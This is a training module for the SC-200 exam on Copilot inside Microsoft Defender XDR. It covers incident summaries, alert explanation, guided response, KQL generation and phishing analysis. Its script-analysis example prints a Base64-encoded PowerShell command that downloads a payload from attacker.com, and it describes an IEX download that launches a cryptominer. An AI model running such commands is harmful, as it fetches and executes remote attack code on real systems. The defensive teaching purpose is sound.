5.4 Embedded Copilot in Defender XDR

12-16 hours · Module 5


SC-200 Exam Objective

Domain 3 — Manage Incident Response: "Investigate incidents by using agentic AI, including embedded Copilot for Security." The Defender XDR embedded experience is the most frequently tested Copilot capability on the SC-200 exam.

Introduction

The embedded Copilot experience in Defender XDR is where most SOC analysts encounter Copilot for the first time. Unlike the standalone portal (which requires navigating to a separate site), the embedded experience appears directly within the Defender portal — integrated into the incident page, the alert detail view, and the Advanced Hunting interface.

The embedded experience provides five key capabilities: incident summary (instant narrative of the incident), alert explanation (what each alert means), guided response (recommended next actions), script analysis (inline analysis of suspicious scripts), and KQL generation (natural language to KQL in Advanced Hunting).


Incident summary

When you open an incident in the Defender XDR portal, Copilot generates an automatic incident summary in the Copilot panel on the right side of the screen. The summary includes: what happened (narrative description of the attack), which entities are involved (users, devices, IPs, email addresses), the timeline (chronological sequence of alerts), and the current status (severity, assignment, investigation stage).

MANUAL TRIAGE vs COPILOT-ASSISTED TRIAGE
Manual (10-15 minutes): open each alert → read details → understand sequence → form narrative
Copilot (30 seconds): open incident → read summary → validate against alert data
Figure 5.3: The incident summary replaces the initial triage phase. Instead of reading each alert individually to form a mental model of the incident, the analyst reads Copilot's summary and validates it against the alert data. The investigation starts from an informed position rather than a blank slate.

How the incident summary works: Copilot reads all alerts in the incident, extracts the key entities and relationships, orders the events chronologically, and generates a natural language narrative. The summary includes MITRE ATT&CK tactic references and identifies the likely attack type (BEC, AiTM, ransomware pre-encryption, insider threat).

Validation workflow: Read the summary, then spot-check 2-3 claims against the actual alert data. Does the summary say the user signed in from Russia? Check the sign-in log. Does it say 5 emails were sent externally? Check the email events. If the spot checks pass, the summary is reliable. If any spot check fails, investigate the discrepancy before relying on the summary.
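The spot-check step can be sketched as a tiny script. The event records, field names, and claims below are hypothetical stand-ins for the real sign-in and email logs:

```python
# Toy spot-check: verify 2-3 summary claims against raw event data.
# All records and field names here are illustrative, not a real schema.
signin_events = [
    {"user": "j.morrison", "country": "RU", "result": "success"},
]
email_events = [{"sender": "j.morrison", "external": True} for _ in range(5)]

claims = {
    "user signed in from Russia": any(
        e["country"] == "RU" and e["result"] == "success" for e in signin_events
    ),
    "5 emails were sent externally": sum(
        1 for e in email_events if e["external"]
    ) == 5,
}

for claim, holds in claims.items():
    status = "verified" if holds else "FAILED - investigate the discrepancy"
    print(f"{claim}: {status}")
```

The point is not automation but discipline: each claim in the summary maps to a concrete check against source data, and any failed check blocks reliance on the summary.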

The summary is regenerated each time you open the incident — it reflects the current state of the incident, including any new alerts that were correlated after your last visit.


Alert explanation

Each alert in the incident has a “Copilot explain” button that generates a contextual explanation: what the alert means, what activity triggered it, why it is considered suspicious, and what the alert indicates about the attack stage.

This is particularly valuable for uncommon alert types that analysts encounter infrequently. An analyst who sees “Suspicious inbox forwarding rule created” daily does not need an explanation. An analyst who encounters “Anomalous token activity following suspicious sign-in” for the first time benefits significantly from Copilot’s explanation of what token replay means, how AiTM attacks work, and why this alert pattern indicates session token theft.

Investigation use: Use alert explanation to build understanding of unfamiliar alerts before investigating them. The explanation provides the context needed to determine the correct investigation path — which data sources to check, which entities to focus on, and what the expected evidence looks like.


Guided response

After summarising the incident and explaining the alerts, Copilot offers guided response recommendations — specific actions to take based on the incident findings. Recommendations vary by incident type.

For a compromised identity incident: “Reset the user’s password,” “Revoke all active sessions,” “Check for inbox forwarding rules,” “Review sign-in activity for the last 7 days.”

For a malware incident: “Isolate the affected device,” “Collect the investigation package,” “Check for lateral movement indicators,” “Run a full antivirus scan.”

For a data exfiltration incident: “Confirm the data was blocked or delivered (check DLP action),” “Assess the data sensitivity,” “Begin data breach notification assessment.”

Critical principle: Guided response recommendations are suggestions, not automated actions. Copilot does not execute response actions — it recommends them. The analyst evaluates each recommendation against the operational context (is this a production server? Is the user in a critical meeting? Does the recommendation align with our incident response procedures?) and decides which to execute.

Some recommendations include a “Take action” link that pre-populates the response action in the Defender portal (e.g., clicking “Isolate device” opens the device isolation panel). This reduces the number of clicks from recommendation to action.


Script analysis

When an alert includes a suspicious script (PowerShell command line, encoded script block, Python script, or bash command), Copilot provides inline script analysis. The analysis includes: a plain-language explanation of what the script does, identification of obfuscation techniques, extraction of IOCs (domains, IPs, file paths, registry keys), and an assessment of the script’s purpose (reconnaissance, credential theft, data exfiltration, persistence establishment).

Example: An alert contains the following PowerShell command:

powershell -enc SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAaAB0AHQAcABzADoALwAvAGEAdAB0AGEAYwBrAGUAcgAuAGMAbwBtAC8AcABhAHkAbABvAGEAZAA=

Manual analysis requires: recognise Base64 encoding, decode the string, read the decoded command, identify the URL, assess the purpose. This takes 5-10 minutes for a simple script, longer for heavily obfuscated multi-stage scripts.
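For a single-layer example like this one, the manual steps are a few lines of Python. PowerShell's `-enc` parameter takes Base64 over a UTF-16LE string; the encoded value below is the one from the alert:

```python
import base64
import re

ENC = "SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAaAB0AHQAcABzADoALwAvAGEAdAB0AGEAYwBrAGUAcgAuAGMAbwBtAC8AcABhAHkAbABvAGEAZAA="

# PowerShell -enc payloads are Base64 of a UTF-16LE (not UTF-8) string
decoded = base64.b64decode(ENC).decode("utf-16-le")
print(decoded)  # Invoke-WebRequest https://attacker.com/payload

# Extract URL IOCs from the decoded command line
iocs = re.findall(r"https?://\S+", decoded)
print(iocs)     # ['https://attacker.com/payload']
```

Multi-stage scripts repeat this loop per layer (decode, read, find the next encoded blob), which is where the manual time cost climbs to the 30-45 minutes mentioned below.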

Copilot analysis: “This PowerShell command decodes to Invoke-WebRequest https://attacker.com/payload, which downloads a file from an external URL. The use of Base64 encoding (-enc parameter) is an obfuscation technique commonly used to evade command-line logging detection. IOC: attacker.com (likely C2 domain). Assessment: initial payload download — likely Stage 1 of a multi-stage attack.”

This analysis takes Copilot 10 seconds. For obfuscated scripts that use multiple layers of encoding, variable substitution, and string concatenation, the time savings are even more dramatic — what takes an analyst 30-45 minutes of manual deobfuscation takes Copilot seconds.


KQL generation in Advanced Hunting

The Advanced Hunting page in Defender XDR includes a Copilot bar that accepts natural language queries and generates KQL. Instead of writing KQL from scratch, describe what you want in natural language and Copilot generates the query.

Natural language to KQL examples:

Prompt: “Show me all successful sign-ins from IP 203.0.113.47 in the last 7 days”

Copilot generates:

AADSignInEventsBeta
| where Timestamp > ago(7d)
| where IPAddress == "203.0.113.47"
| where ErrorCode == 0
| project Timestamp, AccountUpn, IPAddress,
    Application, Country
| order by Timestamp desc

Prompt: “Find all emails with attachments sent by j.morrison to external recipients between March 18 and March 19”

Copilot generates:

EmailEvents
| where Timestamp between (datetime(2026-03-18) .. datetime(2026-03-19))
| where SenderFromAddress =~ "j.morrison@northgateeng.com"
| where RecipientEmailAddress !has "northgateeng.com"
| where AttachmentCount > 0
| project Timestamp, RecipientEmailAddress, Subject, AttachmentCount
| order by Timestamp asc

Iteration pattern: Run the generated query. If the results are not what you expected, describe the issue to Copilot: “The query returned too many results. Add a filter for emails where the delivery action is ‘Delivered’ only.” Copilot modifies the query accordingly. This iterative refinement is faster than editing the KQL manually for analysts who are still building KQL proficiency, and equally fast for experienced analysts who use it as a productivity shortcut.

Validation requirement: Always review the generated KQL before running it. Common Copilot KQL errors include: wrong table names (using a table that does not exist in the Defender XDR schema), incorrect field names (hallucinating a field that sounds right but does not exist), wrong filter operators (using == where has is needed for partial string matching), and incorrect time formats (wrong datetime syntax). These errors are typically obvious to an analyst who knows KQL (from Module 6) and can be corrected in seconds.
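These error classes can also be caught mechanically before running the query. The sketch below is a minimal illustration, not a Microsoft tool; the schema slice and the `lint_kql` helper are hypothetical:

```python
import re

# Hand-maintained slice of the Advanced Hunting schema (illustrative only)
SCHEMA = {
    "EmailEvents": {"Timestamp", "SenderFromAddress", "RecipientEmailAddress",
                    "Subject", "AttachmentCount", "DeliveryAction"},
}

def lint_kql(kql: str) -> list[str]:
    """Warn on table or column names missing from the known schema."""
    text = re.sub(r'"[^"]*"', '""', kql)        # ignore quoted literals
    table = text.strip().splitlines()[0].strip()
    if table not in SCHEMA:
        return [f"unknown table: {table}"]
    known = SCHEMA[table] | {table}
    return [f"unknown column: {ident}"
            for ident in sorted(set(re.findall(r"\b[A-Z][A-Za-z]*\b", text)))
            if ident not in known]

good = 'EmailEvents\n| where AttachmentCount > 0'
bad = 'EmailEvents\n| where AttachmentCnt > 0'   # hallucinated field name
print(lint_kql(good))  # []
print(lint_kql(bad))   # ['unknown column: AttachmentCnt']
```

A check like this only flags name errors; wrong operators (== vs has) and wrong filter values still require a human review of the query logic.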


Identity and device summaries

The embedded Copilot experience also provides summaries for individual entities — users and devices — that appear in incident context.

Identity summary: When you click on a user entity in an incident, Copilot generates an identity assessment: the user’s role, recent sign-in patterns, risk level, devices used, recent alerts involving this identity, and any anomalous behaviour detected. This is the quick-reference that tells you “is this a normal user doing normal things, or is this identity behaving unusually?”

Device summary: When you click on a device entity, Copilot generates a device assessment: the device’s health status, installed security agents, recent alerts, vulnerability exposure, and any suspicious activity. This is the quick-reference that tells you “is this device compromised or healthy?”

Both summaries are generated in seconds and replace the manual process of navigating to the user/device page, reviewing the activity timeline, and forming an assessment — a process that typically takes 5-10 minutes per entity.


Alert correlation explanation

Defender XDR’s correlation engine groups related alerts into incidents, but the logic behind the correlation is not always obvious to the analyst. When an incident contains alerts from 4 different products, understanding why they are correlated is essential for determining whether the correlation is correct (all alerts are truly part of the same attack) or incorrect (unrelated alerts were grouped by coincidence — a shared entity that was involved in multiple unrelated events).

Copilot capability: “Explain why these alerts are correlated into the same incident.”

Copilot analyses the shared entities between alerts and explains: “These 7 alerts are correlated because they share the entity j.morrison@northgateeng.com. Alert 1 (phishing email delivery) and Alert 2 (URL click) share the recipient email. Alert 3 (anomalous sign-in) shares the user identity. Alert 4 (inbox rule creation) shares the user identity and overlaps temporally with Alert 3. Alert 5 (file download) shares the user identity and the attacker IP from Alert 3. Alert 6 (DLP match) shares the user identity and the time window. Alert 7 (Defender for Cloud Apps anomaly) shares the user identity.”

This explanation validates the correlation: all alerts share the same compromised identity and occur within a consistent time window. The correlation is legitimate — this is one multi-stage attack, not 7 separate incidents.

When correlation is wrong: If Copilot’s explanation reveals that alerts share only a generic entity (a common IP address like the corporate VPN exit point, or a broadly used service account), the correlation may be incorrect. Two unrelated alerts sharing a VPN IP does not mean they are the same attack. In this case, the analyst should split the incident — removing the unrelated alert into its own incident for separate investigation.
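The shared-entity reasoning behind both cases can be approximated with simple set intersections. The alert-to-entity mapping below is hypothetical:

```python
from itertools import combinations

# Hypothetical alerts mapped to the entities they reference
alerts = {
    "phishing email delivery": {"j.morrison@northgateeng.com", "203.0.113.47"},
    "anomalous sign-in":       {"j.morrison@northgateeng.com", "203.0.113.47"},
    "unrelated DLP match":     {"vpn-exit.northgateeng.com"},
}

# An entity shared by every alert supports the correlation; an empty
# intersection suggests the incident may need splitting
common = set.intersection(*alerts.values())
print("shared by all alerts:", sorted(common))

# Pairwise overlaps show which alerts actually belong together
for (a, ea), (b, eb) in combinations(alerts.items(), 2):
    if ea & eb:
        print(f"{a} <-> {b}: {sorted(ea & eb)}")
```

Here the first two alerts share both the user and the attacker IP, while the third shares nothing with either, which is the pattern that justifies splitting it into its own incident.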


Device timeline summary with Copilot

When investigating a compromised endpoint as part of a larger incident, the device timeline in MDE can contain thousands of events. Scrolling through the timeline manually to identify the attack sequence takes 15-30 minutes. Copilot summarises the timeline in seconds.

Prompt (in the Defender portal, with the device selected): “Summarise the activity on PROD-WEB-01 between 03:00 and 04:00 UTC, focusing on suspicious processes, network connections, and file modifications.”

Copilot analyses the DeviceProcessEvents, DeviceNetworkEvents, and DeviceFileEvents tables for the specified device and time window, and generates a narrative: “At 03:10, an RDP session was established from IP 203.0.113.47. At 03:12, PowerShell.exe was launched by the RDP session user and executed an IEX (Invoke-Expression) command downloading content from http://malicious.site/payload. At 03:14, the downloaded payload launched xmrig.exe from C:\Temp. At 03:15, xmrig.exe established connections to mining pool stratum+tcp://pool.example.com:3333. No additional process creation or file modification was detected between 03:15 and 04:00.”

This summary gives the analyst the complete attack narrative for this device in 10 seconds. The analyst validates by spot-checking 2-3 events against the raw timeline, then proceeds to containment.
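The time-window filter underlying such a summary can be sketched as follows; the event rows are hypothetical stand-ins for rows from the three device tables:

```python
from datetime import time

# Hypothetical rows for PROD-WEB-01 (in reality these come from
# DeviceProcessEvents, DeviceNetworkEvents, and DeviceFileEvents)
events = [
    {"ts": time(2, 55), "table": "DeviceNetworkEvents",
     "detail": "scheduled heartbeat to update server"},
    {"ts": time(3, 10), "table": "DeviceNetworkEvents",
     "detail": "inbound RDP session from 203.0.113.47"},
    {"ts": time(3, 12), "table": "DeviceProcessEvents",
     "detail": "powershell.exe runs IEX download"},
    {"ts": time(3, 14), "table": "DeviceProcessEvents",
     "detail": "xmrig.exe launched from C:\\Temp"},
]

# Keep only events inside the 03:00-04:00 UTC window, in time order
start, end = time(3, 0), time(4, 0)
window = sorted((e for e in events if start <= e["ts"] < end),
                key=lambda e: e["ts"])

for e in window:
    print(f'{e["ts"]:%H:%M} {e["table"]}: {e["detail"]}')
```

The 02:55 heartbeat falls outside the window and is dropped, mirroring how a scoped prompt keeps routine noise out of the narrative.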


Investigation acceleration: where Copilot makes the biggest difference in Defender XDR

Based on real-world usage patterns, the embedded Copilot in Defender XDR provides the most dramatic time savings in three specific scenarios:

Multi-alert incidents (5+ correlated alerts). The more alerts in an incident, the more time manual triage takes. Copilot’s incident summary scales to any number of alerts — a 15-alert incident is summarised as quickly as a 3-alert incident. The time saving grows proportionally with incident complexity.

Unfamiliar alert types. When an analyst encounters an alert type they have not seen before, understanding what it means and how to investigate it requires documentation research (5-10 minutes). Copilot’s alert explanation provides this understanding in seconds, with the explanation grounded in the specific alert instance rather than generic documentation.

Script-heavy incidents. Alerts involving obfuscated scripts, encoded commands, or multi-stage execution chains require significant manual analysis. Copilot’s script analysis is one of its most reliable capabilities — it handles Base64 decoding, variable deobfuscation, and execution flow analysis with high accuracy. For incidents involving 3-5 suspicious scripts, Copilot saves 30-60 minutes of manual deobfuscation.


Copilot in the investigation graph

The Defender XDR investigation graph visually maps the relationships between entities in an incident — users, devices, IPs, emails, and files connected by lines showing how they relate. For complex incidents with 20+ entities, the graph can be overwhelming.

Copilot assists by explaining the graph: “Describe the key relationships in this incident’s investigation graph.” Copilot identifies the central entities (the compromised user, the attacker IP), the critical relationships (the user signed in from the attacker IP, then accessed the device, then accessed the mailbox), and the peripheral entities (other users who received emails from the compromised account — potential secondary victims).

This explanation converts a visual diagram into a narrative that identifies the investigation priorities: “The central entity is j.morrison — all other entities connect through this identity. The primary investigation path is: attacker IP → j.morrison sign-in → PROD-WEB-01 → SharePoint Finance site. The secondary path is: j.morrison mailbox → 3 internal recipients (potential lateral phishing). Investigate the primary path first, then assess the secondary path.”


Email analysis in Defender for Office 365 with Copilot

When investigating phishing incidents, the embedded Copilot in the Defender portal provides email-specific analysis:

Email header analysis. Copilot analyses email authentication results (SPF, DKIM, DMARC), the sender’s reputation, the message routing path, and any anomalies that indicate spoofing or impersonation. “Analyse the headers of the phishing email in this incident” produces a structured assessment: “SPF: Pass (the sender domain’s SPF record includes the sending IP — this is not spoofed). DKIM: Fail (no valid DKIM signature). DMARC: Fail (alignment failure). Assessment: the email passed SPF because the attacker controls the sending infrastructure, but failed DKIM and DMARC. This is a domain impersonation attack using a lookalike domain, not a spoofed email from the legitimate domain.”
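The authentication-results part of that assessment can be reproduced with a small parser. The header string, lookalike domain, and `parse_auth_results` helper below are hypothetical:

```python
import re

def parse_auth_results(header: str) -> dict:
    """Extract spf/dkim/dmarc verdicts from an Authentication-Results header."""
    results = {}
    for mech in ("spf", "dkim", "dmarc"):
        m = re.search(rf"\b{mech}=(\w+)", header)
        results[mech] = m.group(1) if m else "none"
    return results

header = ("Authentication-Results: spf=pass (sender IP is 203.0.113.47) "
          "smtp.mailfrom=n0rthgateeng.com; dkim=fail (no signature); "
          "dmarc=fail action=quarantine")
verdicts = parse_auth_results(header)
print(verdicts)  # {'spf': 'pass', 'dkim': 'fail', 'dmarc': 'fail'}

# SPF pass with DKIM/DMARC failures is consistent with the
# lookalike-domain impersonation pattern described above
if verdicts["spf"] == "pass" and verdicts["dmarc"] == "fail":
    print("possible lookalike-domain impersonation")
```

The verdict combination is the signal: the attacker's own infrastructure passes SPF for the lookalike domain, but alignment with the impersonated domain still fails.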

URL analysis. Copilot analyses URLs in phishing emails: “The URL in the phishing email redirects through 3 domains: click-tracker.com → redirect-service.net → credential-harvest.com/login. The final destination (credential-harvest.com) was registered 48 hours before the email was sent and uses a domain name similar to the legitimate login portal. Assessment: this is a credential harvesting page using a recently registered lookalike domain.”

Try it yourself

If Copilot is enabled in your Defender XDR portal, open any incident and look for the Copilot panel on the right side of the incident page. Read the incident summary. Click "Explain" on an individual alert. Check the guided response recommendations. Then navigate to Advanced Hunting, click the Copilot bar, and type a natural language query like "Show me all sign-in failures in the last 24 hours." Evaluate the generated KQL — is the table name correct? Are the field names correct? Run the query and check the results.

What you should observe

The incident summary should provide a coherent narrative of the incident. The alert explanation should describe the alert type, the trigger condition, and the security significance. The guided response should list 3-5 specific actions relevant to the incident type. The KQL generation should produce a runnable query — though you may need one iteration to correct field names or filter conditions.


Knowledge check

Check your understanding

1. Copilot's guided response recommends "Isolate the affected device." How should you handle this recommendation?

Answer: Evaluate the recommendation against operational context before executing. Is this a production server? Is isolation appropriate at this stage of the investigation? Will isolation disrupt critical business operations? If the recommendation is appropriate, execute it. If not (e.g., the "device" is a production database server that cannot be isolated without business impact), adapt the response — perhaps restrict network access instead of full isolation. Copilot recommends based on security best practices. You decide based on operational reality.

Incorrect options: "Execute immediately — Copilot recommendations are always correct"; "Ignore it — Copilot does not understand your environment"; "Ask Copilot for permission before executing."

2. Copilot generates a KQL query in Advanced Hunting. You run it and get zero results, but you know the activity occurred. What is the most likely issue?

Answer: The query contains an incorrect filter value. Common Copilot KQL errors: country name vs country code ("Russia" vs "RU"), case sensitivity in field values, incorrect datetime format, or a field name that does not exist in the schema. Check each filter condition against the actual data schema. Run a broad version of the query (remove filters one by one) to identify which filter is excluding the expected results.

Incorrect options: "The data does not exist — the activity did not occur"; "Copilot queries cannot access your data"; "Advanced Hunting is down."